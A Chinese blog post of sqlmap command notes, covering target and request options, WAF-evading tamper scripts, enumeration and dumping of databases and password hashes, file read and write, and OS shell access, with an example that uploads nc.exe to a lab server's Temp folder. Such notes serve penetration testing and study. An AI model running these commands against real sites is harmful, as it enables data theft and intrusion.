zoukankan      html  css  js  c++  java
  • sqlmap使用基础(一)

    记录的是我比较常用的命令。

    sqlmap.py -r 11.txt --random-agent --tamper=space2comment --level 5 --time-sec=2 -technique T

    一、选项

    -h,--help 显示基本帮助信息并退出
    -hh 显示高级帮助信息并退出
    --version 显示程序版本信息并退出

    二、目标

    在这些选项里必须提供至少一个确定目标

    -u  目标URL  
    例:sqlmap -u "www.abc.com/index.php?id=1"
    -m  后接一个txt文件,文件中是多个url,sqlmap会自动化的检测其中的所有url。
    例:sqlmap -m target.txt
    -r  可以将一个post请求方式的数据包(bp抓包)保存在一个txt中,sqlmap会通过post方式检测目标。
    例:sqlmap -r bp.txt
    

    三、请求

    这些选项可以用来指定如何连接到目标URL

    --method=METHOD 指定是get方法还是post方法。
    例: --method=GET --method=POST
    --random-agent  使用随机user-agent进行测试。sqlmap有一个文件中储存了各种各样的user-agent,文件在sqlmap/txt/user-agent.txt 在level>=3时会检测user-agent注入。
    --proxy=PROXY 指定一个代理。
    例: --proxy="127.0.0.1:8080" 使用GoAgent代理。
    --user-agent ""     【自定义user-agent
    --referer  ""  【使用referer欺骗
    

    四、注入

    这些选项可用于指定要测试的参数、提供自定义注入有效载荷和可选的篡改脚本。

    -p  测试参数
    例:  sqlmap -r bp.txt -p "username"
    --skip-static  跳过测试静态参数(有的时候注入有多个参数,那么有些无关紧要的参数修改后页面是没有变化的)
    --no-cast  获取数据时,sqlmap会将所有数据转换成字符串,并用空格代替null。(这个在我们注入失败的时候偶尔会见到,提示尝试使用--no-cast)
    --tamper=TAMPER 使用sqlmap自带的tamper,或者自己写的tamper,来混淆payload,通常用来绕过waf和ips。
    --technique B 指定注入类型
          B : 基于Boolean的盲注(Boolean based blind)
          Q : 内联查询(Inline queries)
          T : 基于时间的盲注(time based blind)
          U : 基于联合查询(Union query based)
          E : 基于错误(error based)
          S : 栈查询(stack queries)
    

    五、检测

    这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容

    --level=LEVEL  执行测试的等级(1-5,默认为1) 
    lv2:cookie; lv3:user-agent,refere; lv5:host 
    在sqlmap/xml/payloads文件内可以看见各个level发送的payload  我常使用--level 3
    --risk=RISK  执行测试的风险(0-3,默认为1) 
    risk 2:基于事件的测试;risk 3:or语句的测试;risk 4:update的测试
    升高风险等级会增加数据被篡改的风险。  常用就是默认1
    --privileges  【查看权限
    

    六、枚举

    这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。 脱库时使用

    -b, --banner        获取数据库管理系统的标识
    --current-user      获取数据库管理系统当前用户
    --current-db        获取数据库管理系统当前数据库
    --hostname          获取数据库服务器的主机名称
    --is-dba            检测DBMS当前用户是否DBA
    --users             枚举数据库管理系统用户
    --passwords         枚举数据库管理系统用户密码哈希
    --privileges        枚举数据库管理系统用户的权限
    --dbs			   枚举数据库管理系统数据库
    --tables		   枚举DBMS数据库中的表
    --columns		   枚举DBMS数据库表列
    -D                  要进行枚举的指定数据库名
    -T                  要进行枚举的指定表名
    -C                  要进行枚举的指定列名
    --dump			   转储数据库表项,查询字段值
    --sea文rch  		   搜索列(S),表(S)和/或数据库名称(S)
    --sql-query=QUERY   要执行的SQL语句
    --sql-shell         提示交互式SQL的shell
    

    七、文件操作

    这些选项可以被用来访问后端数据库管理系统的底层文件系统

    --file-read=RFILE     从后端的数据库管理系统文件系统读取文件
    --file-write=WFILE    编辑后端的数据库管理系统文件系统上的本地文件
    --file-dest=DFILE     后端的数据库管理系统写入文件的绝对路径
    

    在kali中将/software/nc.exe文件上传到C:/WINDOWS/Temp下:

    python sqlmap.py -u"http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write="/software/nc.exe" --file-dest="C:/WINDOWS/Temp/nc.exe"

    八、操作系统访问

    这些选项可以用于访问后端数据库管理系统的底层操作系统

    --os-cmd=OSCMD   	执行操作系统命令(OSCMD)
    --os-shell          交互式的操作系统的shell
    
    os-shell的原理

    文章参考

    https://www.cnblogs.com/lcamry/p/5505110.html

    os-shell使用条件
    网站必须是root权限(current_user()='root')
    网站的绝对路径
    GPC为off(默认为off)

    文章转载参考:https://www.cnblogs.com/sharpff/p/11418858.html
    感谢大佬分享

  • 相关阅读:
    其他魔术方法
    类型约束和类的魔术常量
    PHP对象遍历、内置标准类与数据转对象
    类的自动加载与对象的克隆
    PHP重载与接口
    面向对象
    PHP基础
    地下城与勇士的项目整理
    mysql建表
    jQuery
  • 原文地址:https://www.cnblogs.com/jiaojiaow/p/14251129.html
Copyright © 2011-2022 走看看